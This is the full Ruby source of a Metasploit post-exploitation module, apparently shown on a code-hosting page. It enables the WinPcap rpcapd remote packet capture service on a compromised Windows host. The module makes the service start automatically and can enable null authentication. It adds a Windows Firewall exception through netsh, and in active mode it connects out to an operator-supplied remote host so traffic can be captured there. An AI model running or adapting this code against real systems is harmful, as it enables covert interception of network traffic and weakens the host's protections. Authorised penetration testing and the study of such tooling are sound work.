Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::File
8
  include Msf::Post::Windows::Registry
9
  include Msf::Post::Windows::Services
10
  include Msf::Post::Windows::Priv
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        'Name' => 'Windows Manage Remote Packet Capture Service Starter',
17
        'Description' => %q{
18
          This module enables the Remote Packet Capture System (rpcapd service)
19
          included in the default installation of Winpcap. The module allows you to set up
20
          the service in passive or active mode (useful if the client is behind a firewall).
21
          If authentication is enabled you need a local user account to capture traffic.
22
          PORT will be used depending of the mode configured.
23
        },
24
        'License' => MSF_LICENSE,
25
        'Author' => [ 'Borja Merino <bmerinofe[at]gmail.com>'],
26
        'Platform' => 'win',
27
        'SessionTypes' => [ 'meterpreter' ]
28
      )
29
    )
30

31
    register_options(
32
      [
33
        OptBool.new('NULLAUTH', [ true, 'Enable Null Authentication.', true]),
34
        OptBool.new('ACTIVE', [ true, 'Enable rpcapd in active mode (passive by default).', false]),
35
        OptAddress.new('RHOST', [ false, 'Remote host to connect (set in active mode only).']),
36
        OptInt.new('PORT', [ true, 'Local/Remote port to capture traffic.', 2002])
37
      ]
38
    )
39
  end
40

41
  def run
42
    if is_admin?
43
      serv = service_info('rpcapd')
44
      print_status("Checking if machine #{sysinfo['Computer']} has rpcapd service")
45

46
      if serv[:display] !~ /remote/i
47
        print_error("This machine doesn't seem to have the rpcapd service")
48
      else
49
        print_status("Rpcap service found: #{serv[:display]}")
50

51
        start_type = serv[:starttype]
52
        prog = get_env('ProgramFiles') << '\\winpcap\\rpcapd.exe'
53
        if start_type != START_TYPE_AUTO
54
          print_status("Setting rpcapd as 'auto' service")
55
          service_change_startup('rpcapd', START_TYPE_AUTO)
56
        end
57
        if datastore['ACTIVE']
58
          if datastore['RHOST'].nil?
59
            print_error('RHOST is not set ')
60
            return
61
          else
62
            p = prog << " -d -a #{datastore['RHOST']},#{datastore['PORT']} -v "
63
            print_status("Installing rpcap in ACTIVE mode (remote port: #{datastore['PORT']})")
64
          end
65
        else
66
          fw_enable(prog)
67
          print_status("Installing rpcap in PASSIVE mode (local port: #{datastore['PORT']}) ")
68
          p = prog << " -d -p #{datastore['PORT']} "
69
        end
70
        if datastore['NULLAUTH']
71
          p << '-n'
72
        end
73
        run_rpcapd(p)
74
      end
75
    else
76
      print_error("You don't have enough privileges. Try getsystem.")
77
    end
78
  end
79

80
  def run_rpcapd(p)
81
    service_name = 'rpcapd'
82
    begin
83
      if service_restart(service_name)
84
        print_good("Rpcapd started successfully: #{p}")
85
      else
86
        print_error('There was an error restarting rpcapd.exe.')
87
      end
88
    rescue ::Exception => e
89
      print_error("The following Error was encountered: #{e.class} #{e}")
90
    end
91
  end
92

93
  def fw_enable(prog)
94
    print_status('Enabling rpcapd.exe in Windows Firewall')
95
    begin
96
      if file_exist?(prog)
97
        cmd_exec('netsh', "firewall add allowedprogram \"#{prog}\" \"Windows Service\" ENABLE ", 30)
98
      else
99
        print_error("rpcad.exe doesn't exist in #{prog}. Check the installation of WinPcap")
100
      end
101
    rescue ::Exception => e
102
      print_status("The following Error was encountered: #{e.class} #{e}")
103
    end
104
  end
105
end
106

107